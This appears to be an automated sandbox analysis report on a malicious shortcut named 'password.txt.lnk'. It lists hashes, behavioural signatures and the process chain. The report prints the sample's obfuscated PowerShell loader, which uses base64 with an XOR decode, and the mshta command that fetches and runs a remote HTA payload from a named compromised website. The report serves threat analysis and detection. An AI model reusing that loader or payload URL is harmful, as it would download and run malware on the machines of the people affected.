Analysis
-
max time kernel
1634s -
max time network
1639s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-06-2022 16:06
Static task
static1
Behavioral task
behavioral1
Sample
password.txt.lnk
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
password.txt.lnk
-
Size
1KB
-
MD5
ee5dc8a66298685a6f6790e32e1a006b
-
SHA1
8bd4a8e15b8c097283b67dd8201ed41e01cbe794
-
SHA256
65e7327a6f3efb230a4d61966182f1d1c592aa222f4f820afaca6617680d09bd
-
SHA512
8c0164d4576959d7d474cd39545db1564e459f0ab55e51df601d132d6667b41e8751d236a3850934b0575ae9c1e09e230019609669276d36849da40400f0613c
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 4 976 mshta.exe 5 976 mshta.exe 6 976 mshta.exe 7 976 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1624 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1624 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1628 wrote to memory of 1624 1628 cmd.exe powershell.exe PID 1628 wrote to memory of 1624 1628 cmd.exe powershell.exe PID 1628 wrote to memory of 1624 1628 cmd.exe powershell.exe PID 1624 wrote to memory of 976 1624 powershell.exe mshta.exe PID 1624 wrote to memory of 976 1624 powershell.exe mshta.exe PID 1624 wrote to memory of 976 1624 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\password.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://wang-data-science.com/wp-content/themes/scapeshot/etest.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/976-97-0x0000000000000000-mapping.dmp
-
memory/1624-88-0x0000000000000000-mapping.dmp
-
memory/1624-94-0x000007FEF3E70000-0x000007FEF49CD000-memory.dmpFilesize
11.4MB
-
memory/1624-95-0x0000000002884000-0x0000000002887000-memory.dmpFilesize
12KB
-
memory/1624-96-0x000000001B720000-0x000000001BA1F000-memory.dmpFilesize
3.0MB
-
memory/1624-98-0x0000000002884000-0x0000000002887000-memory.dmpFilesize
12KB
-
memory/1624-99-0x000000000288B000-0x00000000028AA000-memory.dmpFilesize
124KB
-
memory/1628-54-0x000007FEFBA91000-0x000007FEFBA93000-memory.dmpFilesize
8KB